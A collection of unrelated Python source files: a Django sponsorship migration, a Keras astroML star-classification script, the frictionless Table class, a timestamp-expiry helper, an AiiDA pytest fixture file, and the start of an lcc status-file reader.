Sponsor = apps.get_model('sponsorship', 'Sponsor')
Benefit = apps.get_model('sponsorship', 'Benefit')
SponsorBenefit = apps.get_model('sponsorship', 'SponsorBenefit')
db_alias = schema_editor.connection.alias
description_benefit = Benefit.objects.get(name='Company Description')
logo_benefit = Benefit.objects.get(name='Web logo')
for sponsor in Sponsor.objects.using(db_alias):
benefit, __ = sponsor.sponsor_benefits.get_or_create(
benefit=description_benefit,
defaults=dict(
active=True
)
)
benefit.text = sponsor.web_description
benefit.save()
benefit, __ = sponsor.sponsor_benefits.get_or_create(
benefit=logo_benefit,
defaults=dict(
active=True
)
)
benefit.upload = sponsor.web_logo
benefit.save()
class Migration(migrations.Migration):
dependencies = [
('sponsorship', '0005_auto_20150721_1445'),
]
operations = [
migrations.RunPython(forward, back),
]
|
from __future__ import print_function # Use a function definition from future version (say 3.x from 2.7 interpreter)
import matplotlib.pyplot as plt
import numpy as np
import tensorflow as tf
import keras
import math
from keras.metrics import categorical_accuracy
from matplotlib.animation import FuncAnimation
from astroML.utils import completeness_contamination
from astroML.utils import split_samples
from scipy.fftpack import fft, ifft
from keras.models import load_model
#Convert labels from label to CNTK output format, basically an array of 0's with a 1 in the position of the desired label so 9 = [0 0 0 0 0 0 0 0 0 1]
def convertLabels(labels,samplesize,out):
label = np.zeros((samplesize,out),dtype=np.float32)
for i in range(0,len(labels)):
if labels[i] == 0:
label[i,:] = np.array([0,1])
else:
label[i,:] = np.array([1,0])
return label
def reBalanceData(x,y,Multip):
ones = x[np.where(y==1)].copy()
y_ones = y[np.where(y==1)].copy()
total = len(y)
total_one = len(ones)
multiplier = int(math.ceil((total/total_one)*Multip))
for i in range(multiplier):
x = np.insert(x,1,ones,axis=0)
y = np.insert(y,1,y_ones,axis=0)
ran = np.arange(x.shape[0])
np.random.shuffle(ran)
x= x[ran]
y= y[ran]
return x,y
def predictionMap(xlim,ylim):
mesh = []
for x in np.arange(xlim[0],xlim[1],0.001):
for y in np.arange(ylim[0],ylim[1],0.001):
mesh.append([x,y,x*x,y*y])
return (np.array(mesh))
def splitdata(X,y,ratio):
length = X.shape[0]
return X[:int(length*ratio)],X[:int(length*(1-ratio))],y[:int(length*ratio)],y[:int(length*(1-ratio))]
def generateData(multi):
X = np.loadtxt('AstroML_Data.txt')
y = np.loadtxt('AstroML_Labels.txt')
ran = np.arange(X.shape[0])
np.random.shuffle(ran)
X= X[ran]
y= y[ran]
X_train, X_test, y_train, y_test = splitdata(X, y,multi)
X_train, y_train = reBalanceData(X_train,y_train,1.0-multi)
np.save('AstroML_X_Train_Shuffle_Split_0_7_Rebalance_1.npy',X_train)
np.save('AstroML_X_Test_Shuffle_Split_0_7.npy',X_test)
np.save('AstroML_Y_Train_Shuffle_Split_0_7_Rebalance_1.npy',y_train)
np.save('AstroML_Y_Test_Shuffle_Split_0_7.npy',y_test)
X_test, y_test = reBalanceData(X_train,y_train,1.0-multi)
np.save('AstroML_X_Test_Shuffle_Split_0_7_Rebalance_1.npy.npy',X_test)
np.save('AstroML_Y_Test_Shuffle_Split_0_7_Rebalance_1.npy.npy',y_test)
def addSquaredColumn(X_train,X_test,X_test_unbalanced):
for i in range(0,4):
X_train=np.append(X_train,np.multiply(X_train[:,[i]],X_train[:,[i]]),axis=1)
X_test=np.append(X_test,np.multiply(X_test[:,[i]],X_test[:,[i]]),axis=1)
X_test_unbalanced=np.append(X_test_unbalanced,np.multiply(X_test_unbalanced[:,[i]],X_test_unbalanced[:,[i]]),axis=1)
return X_train,X_test,X_test_unbalanced
#%%
############################################
#GPU Checking
from tensorflow.python.client import device_lib
print(device_lib.list_local_devices())
sess = tf.Session(config=tf.ConfigProto(log_device_placement=True))
keras.backend.tensorflow_backend._get_available_gpus()
############# Settings #####################
network = [[4,"tanh"],[3,"tanh"],[1,"sigmoid"]]
LR = 0.1
Epochs = 100
BatchSize = int(math.ceil((np.load('AstroML_X_Train_Shuffle_Split_0_7_Rebalance_1.npy').shape[0])))
Multip = 0.7
addMulti = False
#Load old Model (True) Build new (False)
load=False
#############################################################
comp = []
cont = []
color = []
fig = plt.figure(figsize=(15, 15))
fig.subplots_adjust(bottom=0.15, top=0.95, hspace=0.2,left=0.1, right=0.95, wspace=0.2)
for coll in range(2,5):
X = np.loadtxt('AstroML_Data.txt')
y = np.loadtxt('AstroML_Labels.txt')
X_train = np.load('AstroML_X_Train_Shuffle_Split_0_7_Rebalance_1.npy')
X_test = np.load('AstroML_X_Test_Shuffle_Split_0_7_Rebalance_1.npy')
y_train = np.load('AstroML_Y_Train_Shuffle_Split_0_7_Rebalance_1.npy')
y_test = np.load('AstroML_Y_Test_Shuffle_Split_0_7_Rebalance_1.npy')
X_test_unbalanced = np.load('AstroML_X_Test_Shuffle_Split_0_7.npy')
y_test_unbalanced = np.load('AstroML_Y_Test_Shuffle_Split_0_7.npy')
colSort = []
if addMulti == True:
X_train,X_test,X_test_unbalanced = addSquaredColumn(X_train,X_test,X_test_unbalanced)
colSort2 = [1,0,5,4]
colSort3 = [1,0,2,5,4,6]
colSort4 = [1,0,2,3,5,4,6,7]
else:
colSort2 = [1,0]
colSort3 = [1,0,2]
colSort4 = [1,0,2,3]
if coll==2:
X_train = X_train[:, colSort2] # rearrange columns for better 2-color results
X_test = X_test[:, colSort2] # rearrange columns for better 4-color results
X = X[:, colSort2]
X_test_unbalanced = X_test_unbalanced[:, colSort2] # rearrange columns for better 2-color results
elif coll==3:
X_train = X_train[:, colSort3] # rearrange columns for better 3-color results
X_test = X_test[:, colSort3] # rearrange columns for better 4-color results
X = X[:, colSort3]
X_test_unbalanced = X_test_unbalanced[:, colSort3] # rearrange columns for better 2-color results
elif coll==4:
X_train = X_train[:, colSort4] # rearrange columns for better 4-color results
X_test = X_test[:, colSort4] # rearrange columns for better 4-color results
X = X[:, colSort4]
X_test_unbalanced = X_test_unbalanced[:, colSort4] # rearrange columns for better 2-color results
N_tot = y_train.shape[0]
#Total assignments of 0 (Classification = true)
N_st = np.sum(y_train == 0)
#Total assignments of 1 (Classification = false)
N_rr = N_tot - N_st
N_plot = 5000 + N_rr
#%%
###########################################################
############Netowork Building##############################
if load == True:
if coll==1:
model = load_model('model1.h5')
elif coll==2:
model = load_model('model2.h5')
elif coll==3:
model = load_model('model3.h5')
else:
layers = []
layers.append(keras.layers.Dense(network[0][0],input_dim=(coll),kernel_initializer='normal', activation=network[0][1]))
for layer in range(1,len(network)):
#Dropout
if network[layer][0] == -1:
layers.append(keras.layers.Dropout(network[layer][1]))
else:
layers.append(keras.layers.Dense(network[layer][0],kernel_initializer='normal', activation=network[layer][1]))
model = keras.Sequential(layers)
###############################
#Training
###############################
model.compile(optimizer=keras.optimizers.Adam(lr=LR), loss='binary_crossentropy', metrics=['binary_accuracy', 'categorical_accuracy'])
history = model.fit(X_train, y_train,validation_data=(X_test,y_test), batch_size=BatchSize,epochs=Epochs, verbose=2)
predictions = np.around(model.predict(X_test_unbalanced).reshape(model.predict(X_test_unbalanced).shape[0],))
completeness, contamination = completeness_contamination(predictions,(y_test_unbalanced))
##############################
#Model Evaluation
##############################
scores = model.evaluate(X_test,y_test)
loss = scores[0]
print("\n%s: %.2f%%" % (model.metrics_names[1], scores[1]*100))
comp.append(completeness)
cont.append(contamination)
color.append(coll)
print("completeness",completeness)
print("contamination", contamination)
loss_data = history.history['loss']
epoch_data = np.arange(0,len((loss_data)))
crossVal = history.history['val_loss']
####################################
#Loss Plotting
####################################
ax_loss = fig.add_subplot(221)
im_loss = ax_loss.plot(epoch_data,np.log(loss_data),'-',label=str(coll+1)+" Colours")
ax_loss.plot(epoch_data,np.log(crossVal),'-',label=str(coll+1)+" Colours Cross Val")
ax_loss.set_ylabel('Log(Loss)')
ax_loss.set_xlabel('Epoch')
ax_loss.legend()
#Save Model
model.save('model'+str(coll)+'.h5')
if coll == 2 :
xlim = (0.7, 1.35)
ylim = (-0.15, 0.4)
#predictions = np.transpose(model.predict(X_train))
test = predictionMap(xlim,ylim)
xshape = int((xlim[1]-xlim[0])*1000)+1
yshape = int((ylim[1]-ylim[0])*1000)
test = test[:,colSort2]
predictions =(model.predict(test))
ax_heat = fig.add_subplot(222)
im_heat = ax_heat.imshow(np.transpose(np.reshape(predictions[:,0],(xshape,yshape))),origin='lower',extent=[xlim[0],xlim[1],ylim[0],ylim[1]])
cb = fig.colorbar(im_heat, ax=ax_heat)
cb.set_label('Classification Probability of Variable Main Sequence Stars.')
ax_heat.set_xlabel('$u-g$')
ax_heat.set_ylabel('$g-r$')
ac_cont = fig.add_subplot(223)
im_cont = ac_cont.scatter(X[-N_plot:, 1],X[-N_plot:, 0], c=y[-N_plot:],s=12, lw=0, cmap=plt.cm.binary, zorder=2)
ac_cont.contour(np.reshape(test[:, 1],(xshape,yshape)), np.reshape(test[:, 0],(xshape,yshape)), np.reshape(predictions,(xshape,yshape)),cmap=plt.cm.binary,lw=2)
im_cont.set_clim(-0.5, 1)
ac_cont.set_xlabel('$u-g$')
ac_cont.set_ylabel('$g-r$')
hiddenLayers = "Input: " + str(coll+1) + " "
hiddenLayers = hiddenLayers + " "+str(network[0][0]) + " (activation = "+str(network[0][1])+") "
for layer in range(1,len(network)):
hiddenLayers = hiddenLayers +str(network[layer][0]) + " (activation = "+str(network[layer][1])+") "
fig.suptitle("Epochs = "+str(Epochs)+" Batch Size = "+str(BatchSize)+", Multi = "+str(Multip)+", Learning Rate = "+str(LR)+ "\n Layers-> " +hiddenLayers +"%s: %.2f%%" % (model.metrics_names[1], scores[1]*100),fontsize=22,y=0.98)
####################
#astroML Data
####################
#compML = np.array([0.68613139])
compML = np.array([0.68613139, 0.81021898, 0.87591241])
contML = np.array([ 0.79295154, 0.80143113, 0.79020979])
#contML = np.array([ 0.79295154])
ax = fig.add_subplot(224)
ax.plot(color, comp, 'o-r', ms=6,label="TensorFlow-Completeness")
ax.plot(color, compML, 'o-k', ms=6,label="Gaussian Naive Bayes-Completeness")
ax.plot(color, cont, 'ro--', ms=6,label="TensorFlow-Contamination")
ax.plot(color, contML, 'ko--', ms=6,label="Gaussian Naive Bayes-Contamination")
ax.xaxis.set_major_locator(plt.MultipleLocator(1))
ax.yaxis.set_major_locator(plt.MultipleLocator(0.2))
ax.xaxis.set_major_formatter(plt.NullFormatter())
ax.legend()
ax.set_ylabel('Completeness/Contamination')
ax.set_xlim(0.5, 4.5)
ax.set_ylim(-0.1, 1.1)
ax.grid(True)
ax.set_xlim([1.5,4.5])
plt.tight_layout()
plt.subplots_adjust(hspace = 0.2,wspace=0.2,top=0.89,bottom=0.05)
plt.show()
|
import typing
from pathlib import Path
from copy import deepcopy
from itertools import chain
from .header import Header
from .schema import Schema
from .system import system
from .file import File
from .row import Row
from . import exceptions
from . import errors
from . import helpers
from . import config
class Table:
"""Table representation
API | Usage
-------- | --------
Public | `from frictionless import Table`
This class is at heart of the whole Frictionless framwork.
It loads a data source, and allows you to stream its parsed contents.
```python
with Table("data/table.csv") as table:
table.header == ["id", "name"]
table.read_rows() == [
{'id': 1, 'name': 'english'},
{'id': 2, 'name': '中国人'},
]
```
Parameters:
source (any): Source of the file; can be in various forms.
Usually, it's a string as `<scheme>://path/to/file.<format>`.
It also can be, for example, an array of data arrays/dictionaries.
scheme? (str): Scheme for loading the file (file, http, ...).
If not set, it'll be inferred from `source`.
format? (str): File source's format (csv, xls, ...).
If not set, it'll be inferred from `source`.
encoding? (str): An algorithm to hash data.
It defaults to 'md5'.
encoding? (str): Source encoding.
If not set, it'll be inferred from `source`.
compression? (str): Source file compression (zip, ...).
If not set, it'll be inferred from `source`.
compression_path? (str): A path within the compressed file.
It defaults to the first file in the archive.
control? (dict|Control): File control.
For more infromation, please check the Control documentation.
dialect? (dict|Dialect): Table dialect.
For more infromation, please check the Dialect documentation.
query? (dict|Query): Table query.
For more infromation, please check the Query documentation.
headers? (int|int[]|[int[], str]): Either a row
number or list of row numbers (in case of multi-line headers) to be
considered as headers (rows start counting at 1), or a pair
where the first element is header rows and the second the
header joiner. It defaults to 1.
schema? (dict|Schema): Table schema.
For more infromation, please check the Schema documentation.
sync_schema? (bool): Whether to sync the schema.
If it sets to `True` the provided schema will be mapped to
the inferred schema. It means that, for example, you can
provide a subset of fileds to be applied on top of the inferred
fields or the provided schema can have different order of fields.
patch_schema? (dict): A dictionary to be used as an inferred schema patch.
The form of this dictionary should follow the Schema descriptor form
except for the `fields` property which should be a mapping with the
key named after a field name and the values being a field patch.
For more information, please check "Extracting Data" guide.
infer_type? (str): Enforce all the inferred types to be this type.
For more information, please check "Describing Data" guide.
infer_names? (str[]): Enforce all the inferred fields to have provided names.
For more information, please check "Describing Data" guide.
infer_volume? (int): The amount of rows to be extracted as a samle.
For more information, please check "Describing Data" guide.
It defaults to 100
infer_confidence? (float): A number from 0 to 1 setting the infer confidence.
If 1 the data is guaranteed to be valid against the inferred schema.
For more information, please check "Describing Data" guide.
It defaults to 0.9
infer_missing_values? (str[]): String to be considered as missing values.
For more information, please check "Describing Data" guide.
It defaults to `['']`
lookup? (dict): The lookup is a special object providing relational information.
For more information, please check "Extracting Data" guide.
"""
# Public
def __init__(
self,
source,
*,
# File
scheme=None,
format=None,
hashing=None,
encoding=None,
compression=None,
compression_path=None,
control=None,
# Table
dialect=None,
query=None,
headers=None,
schema=None,
sync_schema=False,
patch_schema=False,
infer_type=None,
infer_names=None,
infer_volume=config.DEFAULT_INFER_VOLUME,
infer_confidence=config.DEFAULT_INFER_CONFIDENCE,
infer_missing_values=config.DEFAULT_MISSING_VALUES,
lookup=None,
):
# Update source
if isinstance(source, Path):
source = str(source)
# Update dialect
if headers is not None:
dialect = (dialect or {}).copy()
if not headers:
dialect["header"] = False
elif isinstance(headers, int):
dialect["headerRows"] = [headers]
elif isinstance(headers, list):
dialect["headerRows"] = headers
if isinstance(headers[0], list):
dialect["headerRows"] = headers[0]
dialect["headerJoin"] = headers[1]
# Store state
self.__parser = None
self.__sample = None
self.__schema = None
self.__header = None
self.__data_stream = None
self.__row_stream = None
self.__row_number = None
self.__row_position = None
self.__field_positions = None
self.__sample_positions = None
# Store params
self.__init_schema = schema
self.__sync_schema = sync_schema
self.__patch_schema = patch_schema
self.__infer_type = infer_type
self.__infer_names = infer_names
self.__infer_volume = infer_volume
self.__infer_confidence = infer_confidence
self.__infer_missing_values = infer_missing_values
self.__lookup = lookup
# Create file
self.__file = File(
source=source,
scheme=scheme,
format=format,
hashing=hashing,
encoding=encoding,
compression=compression,
compression_path=compression_path,
control=control,
dialect=dialect,
query=query,
)
def __enter__(self):
if self.closed:
self.open()
return self
def __exit__(self, type, value, traceback):
self.close()
def __iter__(self):
self.__read_row_stream_raise_closed()
return iter(self.__row_stream)
@property
def path(self):
"""
Returns:
str: file path
"""
return self.__file.path
@property
def source(self):
"""
Returns:
any: file source
"""
return self.__file.source
@property
def scheme(self):
"""
Returns:
str?: file scheme
"""
return self.__file.scheme
@property
def format(self):
"""
Returns:
str?: file format
"""
return self.__file.format
@property
def hashing(self):
"""
Returns:
str?: file hashing
"""
return self.__file.hashing
@property
def encoding(self):
"""
Returns:
str?: file encoding
"""
return self.__file.encoding
@property
def compression(self):
"""
Returns:
str?: file compression
"""
return self.__file.compression
@property
def compression_path(self):
"""
Returns:
str?: file compression path
"""
return self.__file.compression_path
@property
def control(self):
"""
Returns:
Control?: file control
"""
return self.__file.control
@property
def query(self):
"""
Returns:
Query?: table query
"""
return self.__file.query
@property
def dialect(self):
"""
Returns:
Dialect?: table dialect
"""
return self.__file.dialect
@property
def schema(self):
"""
Returns:
Schema?: table schema
"""
return self.__schema
@property
def header(self):
"""
Returns:
str[]?: table header
"""
return self.__header
@property
def sample(self):
"""Tables's rows used as sample.
These sample rows are used internally to infer characteristics of the
source file (e.g. schema, ...).
Returns:
list[]?: table sample
"""
return self.__sample
@property
def stats(self):
"""Table stats
The stats object has:
- hash: str - hashing sum
- bytes: int - number of bytes
- rows: int - number of rows
Returns:
dict?: table stats
"""
return self.__file.stats
@property
def data_stream(self):
"""Data stream in form of a generator of data arrays
Yields:
any[][]?: data stream
"""
return self.__data_stream
@property
def row_stream(self):
"""Row stream in form of a generator of Row objects
Yields:
Row[][]?: row stream
"""
return self.__row_stream
# Open/Close
def open(self):
"""Open the table as "io.open" does
Raises:
FrictionlessException: any exception that occurs
"""
self.close()
if self.__file.query.metadata_errors:
error = self.__file.query.metadata_errors[0]
raise exceptions.FrictionlessException(error)
try:
self.__file.stats = {"hash": "", "bytes": 0, "rows": 0}
self.__parser = system.create_parser(self.__file)
self.__parser.open()
self.__data_stream = self.__read_data_stream()
self.__row_stream = self.__read_row_stream()
self.__row_number = 0
self.__row_position = 0
return self
except exceptions.FrictionlessException as exception:
self.close()
# Ensure not found file is a scheme error
if exception.error.code == "format-error":
loader = system.create_loader(self.__file)
loader.open()
loader.close()
raise
except Exception:
self.close()
raise
def close(self):
"""Close the table as "filelike.close" does"""
if self.__parser:
self.__parser.close()
self.__parser = None
@property
def closed(self):
"""Whether the table is closed
Returns:
bool: if closed
"""
return self.__parser is None
# Read
def read_data(self):
"""Read data stream into memory
Returns:
any[][]: table data
"""
self.__read_data_stream_raise_closed()
return list(self.__data_stream)
def __read_data_stream(self):
self.__read_data_stream_infer()
return self.__read_data_stream_create()
def __read_data_stream_create(self):
stats = self.__file.stats
limit = self.__file.query.limit_rows
offset = self.__file.query.offset_rows or 0
sample_iterator = self.__read_data_stream_create_sample_iterator()
parser_iterator = self.__read_data_stream_create_parser_iterator()
for row_position, cells in chain(sample_iterator, parser_iterator):
self.__row_position = row_position
if offset:
offset -= 1
continue
self.__row_number += 1
stats["rows"] = self.__row_number
yield cells
if limit and limit <= stats["rows"]:
break
def __read_data_stream_create_sample_iterator(self):
return zip(self.__sample_positions, self.__sample)
def __read_data_stream_create_parser_iterator(self):
start = max(self.__sample_positions or [0]) + 1
iterator = enumerate(self.__parser.data_stream, start=start)
for row_position, cells in iterator:
if self.__read_data_stream_pick_skip_row(row_position, cells):
cells = self.__read_data_stream_filter_data(cells, self.__field_positions)
yield row_position, cells
def __read_data_stream_infer(self):
# Create state
sample = []
header = []
field_positions = []
sample_positions = []
schema = Schema(self.__init_schema)
# Prepare header
buffer = []
widths = []
for row_position, cells in enumerate(self.__parser.data_stream, start=1):
buffer.append(cells)
if self.__read_data_stream_pick_skip_row(row_position, cells):
widths.append(len(cells))
if len(widths) >= self.__infer_volume:
break
# Infer header
row_number = 0
dialect = self.__file.dialect
if dialect.get("header") is None and dialect.get("headerRows") is None and widths:
dialect["header"] = False
width = round(sum(widths) / len(widths))
drift = max(round(width * 0.1), 1)
match = list(range(width - drift, width + drift + 1))
for row_position, cells in enumerate(buffer, start=1):
if self.__read_data_stream_pick_skip_row(row_position, cells):
row_number += 1
if len(cells) not in match:
continue
if not helpers.is_only_strings(cells):
continue
del dialect["header"]
if row_number != config.DEFAULT_HEADER_ROWS[0]:
dialect["headerRows"] = [row_number]
break
# Infer table
row_number = 0
header_data = []
header_ready = False
header_numbers = dialect.header_rows or config.DEFAULT_HEADER_ROWS
iterator = chain(buffer, self.__parser.data_stream)
for row_position, cells in enumerate(iterator, start=1):
if self.__read_data_stream_pick_skip_row(row_position, cells):
row_number += 1
# Header
if not header_ready:
if row_number in header_numbers:
header_data.append(helpers.stringify_header(cells))
if row_number >= max(header_numbers):
infer = self.__read_data_stream_infer_header
header, field_positions = infer(header_data)
header_ready = True
if not header_ready or dialect.header:
continue
# Sample
sample.append(self.__read_data_stream_filter_data(cells, field_positions))
sample_positions.append(row_position)
if len(sample) >= self.__infer_volume:
break
# Infer schema
if not schema.fields:
schema.infer(
sample,
type=self.__infer_type,
names=self.__infer_names or header,
confidence=self.__infer_confidence,
missing_values=self.__infer_missing_values,
)
# Sync schema
if self.__sync_schema:
fields = []
mapping = {field.get("name"): field for field in schema.fields}
for name in header:
fields.append(mapping.get(name, {"name": name, "type": "any"}))
schema.fields = fields
# Patch schema
if self.__patch_schema:
patch_schema = deepcopy(self.__patch_schema)
fields = patch_schema.pop("fields", {})
schema.update(patch_schema)
for field in schema.fields:
field.update((fields.get(field.get("name"), {})))
# Confirm schema
if len(schema.field_names) != len(set(schema.field_names)):
note = "Schemas with duplicate field names are not supported"
raise exceptions.FrictionlessException(errors.SchemaError(note=note))
# Store state
self.__sample = sample
self.__schema = schema
self.__field_positions = field_positions
self.__sample_positions = sample_positions
self.__header = Header(header, schema=schema, field_positions=field_positions)
def __read_data_stream_infer_header(self, header_data):
dialect = self.__file.dialect
# No header
if not dialect.header:
return [], list(range(1, len(header_data[0]) + 1))
# Get header
header = []
prev_cells = {}
for cells in header_data:
for index, cell in enumerate(cells):
if prev_cells.get(index) == cell:
continue
prev_cells[index] = cell
if len(header) <= index:
header.append(cell)
continue
header[index] = dialect.header_join.join([header[index], cell])
# Filter header
filter_header = []
field_positions = []
limit = self.__file.query.limit_fields
offset = self.__file.query.offset_fields or 0
for field_position, header in enumerate(header, start=1):
if self.__read_data_stream_pick_skip_field(field_position, header):
if offset:
offset -= 1
continue
filter_header.append(header)
field_positions.append(field_position)
if limit and limit <= len(filter_header):
break
return filter_header, field_positions
def __read_data_stream_pick_skip_field(self, field_position, header):
match = True
for name in ["pick", "skip"]:
if name == "pick":
items = self.__file.query.pick_fields_compiled
else:
items = self.__file.query.skip_fields_compiled
if not items:
continue
match = match and name == "skip"
for item in items:
if item == "<blank>" and header == "":
match = not match
elif isinstance(item, str) and item == header:
match = not match
elif isinstance(item, int) and item == field_position:
match = not match
elif isinstance(item, typing.Pattern) and item.match(header):
match = not match
return match
def __read_data_stream_pick_skip_row(self, row_position, cells):
match = True
cell = cells[0] if cells else None
cell = "" if cell is None else str(cell)
for name in ["pick", "skip"]:
if name == "pick":
items = self.__file.query.pick_rows_compiled
else:
items = self.__file.query.skip_rows_compiled
if not items:
continue
match = match and name == "skip"
for item in items:
if item == "<blank>":
if not any(cell for cell in cells if cell not in ["", None]):
match = not match
elif isinstance(item, str):
if item == cell or (item and cell.startswith(item)):
match = not match
elif isinstance(item, int) and item == row_position:
match = not match
elif isinstance(item, typing.Pattern) and item.match(cell):
match = not match
return match
def __read_data_stream_filter_data(self, cells, field_positions):
if self.__file.query.is_field_filtering:
result = []
for field_position, cell in enumerate(cells, start=1):
if field_position in field_positions:
result.append(cell)
return result
return cells
def __read_data_stream_raise_closed(self):
if not self.__data_stream:
note = 'the table has not been opened by "table.open()"'
raise exceptions.FrictionlessException(errors.Error(note=note))
def read_rows(self):
"""Read row stream into memory
Returns:
Row[][]: table rows
"""
self.__read_row_stream_raise_closed()
return list(self.__row_stream)
def __read_row_stream(self):
return self.__read_row_stream_create()
def __read_row_stream_create(self):
schema = self.schema
# Create state
memory_unique = {}
memory_primary = {}
foreign_groups = []
for field in self.schema.fields:
if field.constraints.get("unique"):
memory_unique[field.name] = {}
if self.__lookup:
for fk in self.schema.foreign_keys:
group = {}
group["sourceName"] = fk["reference"]["resource"]
group["sourceKey"] = tuple(fk["reference"]["fields"])
group["targetKey"] = tuple(fk["fields"])
foreign_groups.append(group)
# Stream rows
for cells in self.__data_stream:
# Create row
row = Row(
cells,
schema=self.__schema,
field_positions=self.__field_positions,
row_position=self.__row_position,
row_number=self.__file.stats["rows"],
)
# Unique Error
if memory_unique:
for field_name in memory_unique.keys():
cell = row[field_name]
if cell is not None:
match = memory_unique[field_name].get(cell)
memory_unique[field_name][cell] = row.row_position
if match:
Error = errors.UniqueError
note = "the same as in the row at position %s" % match
error = Error.from_row(row, note=note, field_name=field_name)
row.errors.append(error)
# Primary Key Error
if schema.primary_key:
cells = tuple(row[field_name] for field_name in schema.primary_key)
if set(cells) == {None}:
note = 'cells composing the primary keys are all "None"'
error = errors.PrimaryKeyError.from_row(row, note=note)
row.errors.append(error)
else:
match = memory_primary.get(cells)
memory_primary[cells] = row.row_position
if match:
if match:
note = "the same as in the row at position %s" % match
error = errors.PrimaryKeyError.from_row(row, note=note)
row.errors.append(error)
# Foreign Key Error
if foreign_groups:
for group in foreign_groups:
group_lookup = self.__lookup.get(group["sourceName"])
if group_lookup:
cells = tuple(row[name] for name in group["targetKey"])
if set(cells) == {None}:
continue
match = cells in group_lookup.get(group["sourceKey"], set())
if not match:
note = "not found in the lookup table"
error = errors.ForeignKeyError.from_row(row, note=note)
row.errors.append(error)
# Stream row
yield row
def __read_row_stream_raise_closed(self):
if not self.__row_stream:
note = 'the table has not been opened by "table.open()"'
raise exceptions.FrictionlessException(errors.Error(note=note))
# Write
# NOTE: implement proper usage of loaders (e.g. write to s3)
# NOTE: allow None target and return result for inline/pandas/etc?
def write(
self,
target,
*,
scheme=None,
format=None,
hashing=None,
encoding=None,
compression=None,
compression_path=None,
control=None,
dialect=None,
):
"""Write the table to the target
Parameters:
target (str): target path
**options: subset of Table's constructor options
"""
# Create file
file = File(
source=target,
scheme=scheme,
format=format,
hashing=hashing,
encoding=encoding,
compression=compression,
compression_path=compression_path,
control=control,
dialect=dialect,
)
# Write file
row_stream = self.__write_row_stream_create()
parser = system.create_parser(file)
parser.write(row_stream)
def __write_row_stream_create(self):
self.__read_data_stream_raise_closed()
yield from self.row_stream
|
import datetime
from abc import ABCMeta
class IExpirable(metaclass=ABCMeta):
def __init__(self):
self.time_stamp = None
self.retrieved_time_stamp = None
def set_retrieved_time_stamp(self, time_stamp):
self.retrieved_time_stamp = time_stamp
def set_time_stamp(self, time_stamp):
self.time_stamp = datetime.datetime.strptime(time_stamp, '%Y-%m-%dT%H:%M:%S.%f')
def is_expired(self, expire_minutes, use_retrieved_time_stamp=False):
utc_now = datetime.datetime.utcnow()
time_stamp_to_compare = self.retrieved_time_stamp if use_retrieved_time_stamp else self.time_stamp
if time_stamp_to_compare is None:
return True
return time_stamp_to_compare + datetime.timedelta(minutes=expire_minutes) < utc_now
def is_most_recent(self, other_expirable, use_retrieved_time_stamp=False):
if other_expirable is None:
return True
other_time_stamp_to_compare = other_expirable.retrieved_time_stamp if use_retrieved_time_stamp else other_expirable.time_stamp
if other_time_stamp_to_compare is None:
return True
time_stamp_to_compare = self.retrieved_time_stamp if use_retrieved_time_stamp else self.time_stamp
return time_stamp_to_compare > other_time_stamp_to_compare
|
# -*- coding: utf-8 -*-
"""
For pytest
initialise a test database and profile
"""
import os
import pytest
from aiida_ddec.calculations import DENSITY_DIR_EXTRA, DENSITY_DIR_SYMLINK
from tests import DATA_DIR
from examples import DATA_DIR as EXAMPLES_DATA_DIR
pytest_plugins = ['aiida.manage.tests.pytest_fixtures', 'aiida_testing.mock_code'] # pylint: disable=invalid-name
@pytest.fixture(scope='function', autouse=True)
def clear_database_auto(clear_database): # pylint: disable=unused-argument
"""Automatically clear database in between tests."""
@pytest.fixture(scope='function')
def cp2k_code(mock_code_factory):
"""Create mocked "cp2k" code."""
return mock_code_factory(
label='cp2k-7.1',
data_dir_abspath=DATA_DIR,
entry_point='cp2k',
# files *not* to copy into the data directory
ignore_paths=('_aiidasubmit.sh', 'BASIS_MOLOPT', 'GTH_POTENTIALS', 'dftd3.dat', '*.bak*'))
@pytest.fixture(scope='function')
def raspa_code(mock_code_factory):
"""Create mocked "raspa" code."""
return mock_code_factory(
label='raspa-e968334',
data_dir_abspath=DATA_DIR,
entry_point='raspa',
# paths *not* to copy into the data directory
ignore_paths=('_aiidasubmit.sh', 'CrashRestart/*', 'Movies/*', 'VTK/*', 'RestartInitial/*'))
@pytest.fixture(scope='function')
def zeopp_code(mock_code_factory):
"""Create mocked "zeo++" code."""
return mock_code_factory(
label='zeopp-0.3',
data_dir_abspath=DATA_DIR,
entry_point='zeopp.network',
# files *not* to copy into the data directory
ignore_paths=('_aiidasubmit.sh', 'UFF.rad'))
@pytest.fixture(scope='function')
def ddec_code(mock_code_factory):
"""Create mocked "ddec" code."""
code = mock_code_factory(
label='chargemol-09_26_2017',
data_dir_abspath=DATA_DIR,
entry_point='ddec',
# files *not* to copy into the data directory
ignore_paths=('_aiidasubmit.sh', '*.cube', DENSITY_DIR_SYMLINK))
# Set atomic density directory extra on code
density_dir = os.environ.get(DENSITY_DIR_EXTRA)
if not density_dir:
density_dir = EXAMPLES_DATA_DIR / 'ddec' / 'atomic_densities'
code.set_extra(DENSITY_DIR_EXTRA, str(density_dir))
return code
|
import ast
import os
from lcc.entities.exceptions import InvalidFilesPath
import numpy as np
from lcc.utils.helpers import sub_dict_in_dict
from lcc.utils.helpers import check_depth
class StatusResolver(object):
'''
This class is responsible for status files generated thru systematic searches
into databases and for reading files of planned queries.
Attributes
----------
status_header : list
Column names of status file
status_queries : list
Rows of status file
'''
NUM_STATUS_INFO = 4 # Number of status info columns +1
DELIMITER = ";"
def __init__(self, status_file_path):
'''
Parameters
----------
status_file_path : str
Path to the status file
FORMAT OF STATUS FILE:
#first_query_param second_query_param other_query_param found filtered passed
value1 value2 other_value True/False True/False True/False
...
This file is generated automatically during systematic search.
'''
self.status_header, self.status_queries = self._readFile(
status_file_path)
@classmethod
def getUnsearchedQuery(self, search_plan_file):
'''
Return list of queries which have not been queried yet.
Parameters
----------
Search_plan_file : str
Path to the file of planned queries
Returns
-------
list
List of query dictionaries
Note
----
FORMAT OF PLAN QUERIES FILE is the same as status file except 3 last
columns (without found, filtered and passed)
'''
plan_header, plan_queries = self._readFile(search_plan_file)
header_restr = self.status_header[:-self.NUM_STATUS_INFO]
col_num = len(header_restr)
queries_restr = np.hsplit(self.status_queries, np.array([col_num]))[0]
status_dict = self._getDictQuery(header_restr, queries_restr)
plan_dict = self._getDictQuery(plan_header, plan_queries)
return self._getDiff(plan_dict, status_dict)
def getWithStatus(self, stat):
'''
Get queries with given query status
Parameters
----------
stat : dict
Dictionary with status column name and its value
Example
--------
getStatus({"passed" : True}) --> [{"field":1,"starid":1, "target":"lmc"}, .. , {...}]
